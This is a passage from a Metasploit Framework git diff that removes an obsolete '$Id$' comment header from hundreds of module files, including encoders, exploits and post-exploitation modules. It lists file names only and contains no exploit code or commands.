4 ---- modules/post/multi/gather/gpg_creds.rb | 4 ---- modules/post/multi/gather/multi_command.rb | 4 ---- modules/post/multi/gather/pidgin_cred.rb | 4 ---- modules/post/multi/gather/ping_sweep.rb | 4 ---- modules/post/multi/gather/run_console_rc_file.rb | 4 ---- modules/post/multi/gather/skype_enum.rb | 4 ---- modules/post/multi/gather/ssh_creds.rb | 4 ---- modules/post/multi/general/close.rb | 4 ---- modules/post/multi/general/execute.rb | 4 ---- modules/post/multi/manage/multi_post.rb | 4 ---- modules/post/multi/manage/sudo.rb | 3 --- modules/post/multi/manage/system_session.rb | 4 ---- modules/post/osx/gather/enum_osx.rb | 4 ---- modules/post/osx/gather/hashdump.rb | 4 ---- modules/post/solaris/gather/checkvm.rb | 3 --- modules/post/solaris/gather/enum_packages.rb | 3 --- modules/post/solaris/gather/enum_services.rb | 3 --- modules/post/solaris/gather/hashdump.rb | 3 --- modules/post/windows/capture/keylog_recorder.rb | 4 ---- modules/post/windows/capture/lockout_keylogger.rb | 4 ---- modules/post/windows/escalate/bypassuac.rb | 4 ---- modules/post/windows/escalate/getsystem.rb | 4 ---- modules/post/windows/escalate/ms10_073_kbdlayout.rb | 4 ---- modules/post/windows/escalate/net_runtime_modify.rb | 4 ---- modules/post/windows/escalate/screen_unlock.rb | 4 ---- modules/post/windows/escalate/service_permissions.rb | 4 ---- modules/post/windows/gather/arp_scanner.rb | 4 ---- modules/post/windows/gather/bitcoin_jacker.rb | 2 -- modules/post/windows/gather/cachedump.rb | 4 ---- modules/post/windows/gather/credentials/coreftp.rb | 4 ---- .../post/windows/gather/credentials/credential_collector.rb | 4 ---- modules/post/windows/gather/credentials/dyndns.rb | 4 ---- modules/post/windows/gather/credentials/enum_cred_store.rb | 4 ---- modules/post/windows/gather/credentials/enum_picasa_pwds.rb | 4 ---- modules/post/windows/gather/credentials/epo_sql.rb | 4 ---- modules/post/windows/gather/credentials/filezilla_server.rb | 4 ---- modules/post/windows/gather/credentials/flashfxp.rb | 2 -- modules/post/windows/gather/credentials/ftpnavigator.rb | 4 ---- modules/post/windows/gather/credentials/idm.rb | 4 ---- modules/post/windows/gather/credentials/imail.rb | 4 ---- modules/post/windows/gather/credentials/meebo.rb | 4 ---- modules/post/windows/gather/credentials/mremote.rb | 4 ---- modules/post/windows/gather/credentials/nimbuzz.rb | 4 ---- modules/post/windows/gather/credentials/smartftp.rb | 4 ---- modules/post/windows/gather/credentials/total_commander.rb | 2 -- modules/post/windows/gather/credentials/trillian.rb | 4 ---- modules/post/windows/gather/credentials/vnc.rb | 4 ---- modules/post/windows/gather/credentials/windows_autologin.rb | 4 ---- modules/post/windows/gather/credentials/winscp.rb | 4 ---- modules/post/windows/gather/credentials/wsftp_client.rb | 2 -- modules/post/windows/gather/dumplinks.rb | 4 ---- modules/post/windows/gather/enum_applications.rb | 4 ---- modules/post/windows/gather/enum_devices.rb | 4 ---- modules/post/windows/gather/enum_dirperms.rb | 4 ---- modules/post/windows/gather/enum_domain.rb | 4 ---- modules/post/windows/gather/enum_domain_group_users.rb | 4 ---- modules/post/windows/gather/enum_domain_tokens.rb | 4 ---- modules/post/windows/gather/enum_hostfile.rb | 4 ---- modules/post/windows/gather/enum_logged_on_users.rb | 4 ---- modules/post/windows/gather/enum_ms_product_keys.rb | 4 ---- modules/post/windows/gather/enum_powershell_env.rb | 4 ---- modules/post/windows/gather/enum_proxy.rb | 4 ---- modules/post/windows/gather/enum_services.rb | 4 ---- modules/post/windows/gather/enum_shares.rb | 4 ---- modules/post/windows/gather/enum_snmp.rb | 4 ---- modules/post/windows/gather/enum_termserv.rb | 4 ---- modules/post/windows/gather/enum_tokens.rb | 4 ---- modules/post/windows/gather/forensics/enum_drives.rb | 1 - modules/post/windows/gather/forensics/imager.rb | 1 - modules/post/windows/gather/forensics/nbd_server.rb | 4 ---- modules/post/windows/gather/hashdump.rb | 4 ---- modules/post/windows/gather/memory_grep.rb | 4 ---- modules/post/windows/gather/resolve_sid.rb | 4 ---- modules/post/windows/gather/reverse_lookup.rb | 4 ---- modules/post/windows/gather/screen_spy.rb | 4 ---- modules/post/windows/gather/smart_hashdump.rb | 4 ---- modules/post/windows/gather/tcpnetstat.rb | 4 ---- modules/post/windows/gather/usb_history.rb | 4 ---- modules/post/windows/gather/wmic_command.rb | 4 ---- modules/post/windows/manage/add_user_domain.rb | 4 ---- modules/post/windows/manage/autoroute.rb | 4 ---- modules/post/windows/manage/clone_proxy_settings.rb | 4 ---- modules/post/windows/manage/delete_user.rb | 4 ---- modules/post/windows/manage/enable_rdp.rb | 4 ---- modules/post/windows/manage/inject_ca.rb | 4 ---- modules/post/windows/manage/inject_host.rb | 4 ---- modules/post/windows/manage/migrate.rb | 4 ---- modules/post/windows/manage/multi_meterpreter_inject.rb | 4 ---- modules/post/windows/manage/nbd_server.rb | 1 - modules/post/windows/manage/payload_inject.rb | 4 ---- modules/post/windows/manage/persistence.rb | 4 ---- modules/post/windows/manage/pxexploit.rb | 4 ---- modules/post/windows/manage/remove_ca.rb | 4 ---- modules/post/windows/manage/remove_host.rb | 4 ---- modules/post/windows/manage/run_as.rb | 4 ---- modules/post/windows/manage/smart_migrate.rb | 4 ---- modules/post/windows/manage/vss_create.rb | 4 ---- modules/post/windows/manage/vss_list.rb | 4 ---- modules/post/windows/manage/vss_mount.rb | 4 ---- modules/post/windows/manage/vss_set_storage.rb | 4 ---- modules/post/windows/manage/vss_storage.rb | 4 ---- modules/post/windows/recon/computer_browser_discovery.rb | 4 ---- modules/post/windows/wlan/wlan_bss_list.rb | 4 ---- modules/post/windows/wlan/wlan_current_connection.rb | 4 ---- modules/post/windows/wlan/wlan_disconnect.rb | 4 ---- modules/post/windows/wlan/wlan_profile.rb | 4 ---- 1114 files changed, 4424 deletions(-) diff --git a/modules/encoders/cmd/generic_sh.rb b/modules/encoders/cmd/generic_sh.rb index 41f6b78c6c..9fbd09b86f 100644 --- a/modules/encoders/cmd/generic_sh.rb +++ b/modules/encoders/cmd/generic_sh.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/cmd/ifs.rb b/modules/encoders/cmd/ifs.rb index f82ab049fd..08d4ba9b6e 100644 --- a/modules/encoders/cmd/ifs.rb +++ b/modules/encoders/cmd/ifs.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/cmd/printf_php_mq.rb b/modules/encoders/cmd/printf_php_mq.rb index 224707540c..b391d595bf 100644 --- a/modules/encoders/cmd/printf_php_mq.rb +++ b/modules/encoders/cmd/printf_php_mq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/encoder_test.rb.ut.rb b/modules/encoders/encoder_test.rb.ut.rb index 5fa40db392..c61ba745a3 100644 --- a/modules/encoders/encoder_test.rb.ut.rb +++ b/modules/encoders/encoder_test.rb.ut.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/generic/none.rb b/modules/encoders/generic/none.rb index 334891f6fb..3558d1c466 100644 --- a/modules/encoders/generic/none.rb +++ b/modules/encoders/generic/none.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/generic/none.rb.ut.rb b/modules/encoders/generic/none.rb.ut.rb index 3d71ddfaf9..0b4e178959 100644 --- a/modules/encoders/generic/none.rb.ut.rb +++ b/modules/encoders/generic/none.rb.ut.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/mipsbe/longxor.rb b/modules/encoders/mipsbe/longxor.rb index 1aa28125b1..f0d3712471 100644 --- a/modules/encoders/mipsbe/longxor.rb +++ b/modules/encoders/mipsbe/longxor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/mipsle/longxor.rb b/modules/encoders/mipsle/longxor.rb index 607997507a..8f8e60655f 100644 --- a/modules/encoders/mipsle/longxor.rb +++ b/modules/encoders/mipsle/longxor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/php/base64.rb b/modules/encoders/php/base64.rb index f6d545d303..60e2190b6d 100644 --- a/modules/encoders/php/base64.rb +++ b/modules/encoders/php/base64.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/ppc/longxor.rb b/modules/encoders/ppc/longxor.rb index ae8db7ec76..d5c899f658 100644 --- a/modules/encoders/ppc/longxor.rb +++ b/modules/encoders/ppc/longxor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/ppc/longxor_tag.rb b/modules/encoders/ppc/longxor_tag.rb index 9eab4a144b..430cb6bdb6 100644 --- a/modules/encoders/ppc/longxor_tag.rb +++ b/modules/encoders/ppc/longxor_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/sparc/longxor_tag.rb b/modules/encoders/sparc/longxor_tag.rb index 1f886c409c..e24dd39dc9 100644 --- a/modules/encoders/sparc/longxor_tag.rb +++ b/modules/encoders/sparc/longxor_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x64/xor.rb b/modules/encoders/x64/xor.rb index 0d15639b9b..e09dcc5c4b 100644 --- a/modules/encoders/x64/xor.rb +++ b/modules/encoders/x64/xor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/alpha_mixed.rb b/modules/encoders/x86/alpha_mixed.rb index 9cfb1947ca..a6d3d0c2e1 100644 --- a/modules/encoders/x86/alpha_mixed.rb +++ b/modules/encoders/x86/alpha_mixed.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/alpha_upper.rb b/modules/encoders/x86/alpha_upper.rb index 0a43f3d490..ba6556cb0c 100644 --- a/modules/encoders/x86/alpha_upper.rb +++ b/modules/encoders/x86/alpha_upper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/avoid_underscore_tolower.rb b/modules/encoders/x86/avoid_underscore_tolower.rb index 4e753656bd..24e3cd0293 100644 --- a/modules/encoders/x86/avoid_underscore_tolower.rb +++ b/modules/encoders/x86/avoid_underscore_tolower.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/avoid_utf8_tolower.rb b/modules/encoders/x86/avoid_utf8_tolower.rb index ae9a8c3bf2..21051e1fc0 100644 --- a/modules/encoders/x86/avoid_utf8_tolower.rb +++ b/modules/encoders/x86/avoid_utf8_tolower.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/call4_dword_xor.rb b/modules/encoders/x86/call4_dword_xor.rb index b7d291251f..82072ac060 100644 --- a/modules/encoders/x86/call4_dword_xor.rb +++ b/modules/encoders/x86/call4_dword_xor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/call4_dword_xor.rb.ut.rb b/modules/encoders/x86/call4_dword_xor.rb.ut.rb index c4960a6ae9..8ca4866fcb 100644 --- a/modules/encoders/x86/call4_dword_xor.rb.ut.rb +++ b/modules/encoders/x86/call4_dword_xor.rb.ut.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/context_cpuid.rb b/modules/encoders/x86/context_cpuid.rb index bd854efa4e..2355659456 100644 --- a/modules/encoders/x86/context_cpuid.rb +++ b/modules/encoders/x86/context_cpuid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/context_stat.rb b/modules/encoders/x86/context_stat.rb index c55a47260b..0b70208f52 100644 --- a/modules/encoders/x86/context_stat.rb +++ b/modules/encoders/x86/context_stat.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/context_time.rb b/modules/encoders/x86/context_time.rb index 18d0a81b39..60f5447ab0 100644 --- a/modules/encoders/x86/context_time.rb +++ b/modules/encoders/x86/context_time.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/countdown.rb b/modules/encoders/x86/countdown.rb index 56053038c3..cbc6b5f0a3 100644 --- a/modules/encoders/x86/countdown.rb +++ b/modules/encoders/x86/countdown.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/countdown.rb.ut.rb b/modules/encoders/x86/countdown.rb.ut.rb index b3cc71bc5d..5c1755275b 100644 --- a/modules/encoders/x86/countdown.rb.ut.rb +++ b/modules/encoders/x86/countdown.rb.ut.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/fnstenv_mov.rb b/modules/encoders/x86/fnstenv_mov.rb index 3d472e325c..c82a691b0e 100644 --- a/modules/encoders/x86/fnstenv_mov.rb +++ b/modules/encoders/x86/fnstenv_mov.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/fnstenv_mov.rb.ut.rb b/modules/encoders/x86/fnstenv_mov.rb.ut.rb index 529e0e6f79..a486d675f2 100644 --- a/modules/encoders/x86/fnstenv_mov.rb.ut.rb +++ b/modules/encoders/x86/fnstenv_mov.rb.ut.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/jmp_call_additive.rb b/modules/encoders/x86/jmp_call_additive.rb index 5e276d2b7d..e3aa456051 100644 --- a/modules/encoders/x86/jmp_call_additive.rb +++ b/modules/encoders/x86/jmp_call_additive.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/nonalpha.rb b/modules/encoders/x86/nonalpha.rb index 37731b7b98..d550eec8e5 100644 --- a/modules/encoders/x86/nonalpha.rb +++ b/modules/encoders/x86/nonalpha.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/nonupper.rb b/modules/encoders/x86/nonupper.rb index e92a364e9c..6ca447487b 100644 --- a/modules/encoders/x86/nonupper.rb +++ b/modules/encoders/x86/nonupper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb index a0ffda867c..6f5f31b349 100644 --- a/modules/encoders/x86/shikata_ga_nai.rb +++ b/modules/encoders/x86/shikata_ga_nai.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/single_static_bit.rb b/modules/encoders/x86/single_static_bit.rb index bf0592f1fc..7d0810d986 100644 --- a/modules/encoders/x86/single_static_bit.rb +++ b/modules/encoders/x86/single_static_bit.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/unicode_mixed.rb b/modules/encoders/x86/unicode_mixed.rb index b47d229a41..8b4c37cb1d 100644 --- a/modules/encoders/x86/unicode_mixed.rb +++ b/modules/encoders/x86/unicode_mixed.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/unicode_upper.rb b/modules/encoders/x86/unicode_upper.rb index 5301f80026..db109901e1 100644 --- a/modules/encoders/x86/unicode_upper.rb +++ b/modules/encoders/x86/unicode_upper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/aix/rpc_cmsd_opcode21.rb b/modules/exploits/aix/rpc_cmsd_opcode21.rb index a8fb6c4567..36ea136c53 100644 --- a/modules/exploits/aix/rpc_cmsd_opcode21.rb +++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb index 742b7e9210..98a9ba43df 100644 --- a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb +++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/apple_ios/browser/safari_libtiff.rb b/modules/exploits/apple_ios/browser/safari_libtiff.rb index d9a8eff764..5b391b90b1 100644 --- a/modules/exploits/apple_ios/browser/safari_libtiff.rb +++ b/modules/exploits/apple_ios/browser/safari_libtiff.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb index b488909f79..5c8cb487a1 100644 --- a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb +++ b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb index 085b11fe93..ff5758e3b7 100644 --- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb +++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/dialup/multi/login/manyargs.rb b/modules/exploits/dialup/multi/login/manyargs.rb index e55dbbfc04..b3ba6482e1 100644 --- a/modules/exploits/dialup/multi/login/manyargs.rb +++ b/modules/exploits/dialup/multi/login/manyargs.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb index 00ab7533ca..09e1330eb7 100644 --- a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/freebsd/samba/trans2open.rb b/modules/exploits/freebsd/samba/trans2open.rb index f07ac6d499..f182de1732 100644 --- a/modules/exploits/freebsd/samba/trans2open.rb +++ b/modules/exploits/freebsd/samba/trans2open.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb index 98cb5833df..9205302b7c 100644 --- a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb +++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/hpux/lpd/cleanup_exec.rb b/modules/exploits/hpux/lpd/cleanup_exec.rb index 786eba79d1..bd4c725aa4 100644 --- a/modules/exploits/hpux/lpd/cleanup_exec.rb +++ b/modules/exploits/hpux/lpd/cleanup_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/irix/lpd/tagprinter_exec.rb b/modules/exploits/irix/lpd/tagprinter_exec.rb index a7b5bc863e..3f4c91b9d5 100644 --- a/modules/exploits/irix/lpd/tagprinter_exec.rb +++ b/modules/exploits/irix/lpd/tagprinter_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/ftp/proftp_sreplace.rb b/modules/exploits/linux/ftp/proftp_sreplace.rb index 56615ba85b..8ca7aa1326 100644 --- a/modules/exploits/linux/ftp/proftp_sreplace.rb +++ b/modules/exploits/linux/ftp/proftp_sreplace.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb index 6704b33697..a88cfa4b2b 100644 --- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index 2531bd8ce5..049d3da217 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index 1d93099d9a..7ebe8502c4 100644 --- a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb index ca5136397e..9f203c09c8 100644 --- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb +++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/http/gpsd_format_string.rb b/modules/exploits/linux/http/gpsd_format_string.rb index 0dacd263fd..7480062360 100644 --- a/modules/exploits/linux/http/gpsd_format_string.rb +++ b/modules/exploits/linux/http/gpsd_format_string.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index dbfdd9d141..05a422462d 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb index d07d82be9d..18fe402d38 100644 --- a/modules/exploits/linux/http/peercast_url.rb +++ b/modules/exploits/linux/http/peercast_url.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index e2501f3a79..8474a904f4 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/ids/snortbopre.rb b/modules/exploits/linux/ids/snortbopre.rb index dfd96782da..091f8c0e45 100644 --- a/modules/exploits/linux/ids/snortbopre.rb +++ b/modules/exploits/linux/ids/snortbopre.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb index fe683d76fb..462d157ffe 100644 --- a/modules/exploits/linux/imap/imap_uw_lsub.rb +++ b/modules/exploits/linux/imap/imap_uw_lsub.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb index c2b40605ef..560bd8e576 100644 --- a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb +++ b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb index 7e94afe2ca..a6d44e62c7 100644 --- a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb +++ b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index 43b4d71038..2687316eda 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/misc/gld_postfix.rb b/modules/exploits/linux/misc/gld_postfix.rb index d03c95e781..1f8d9b3dff 100644 --- a/modules/exploits/linux/misc/gld_postfix.rb +++ b/modules/exploits/linux/misc/gld_postfix.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/misc/hplip_hpssd_exec.rb b/modules/exploits/linux/misc/hplip_hpssd_exec.rb index d26a2c9946..f8f3142ffe 100644 --- a/modules/exploits/linux/misc/hplip_hpssd_exec.rb +++ b/modules/exploits/linux/misc/hplip_hpssd_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/misc/ib_inet_connect.rb 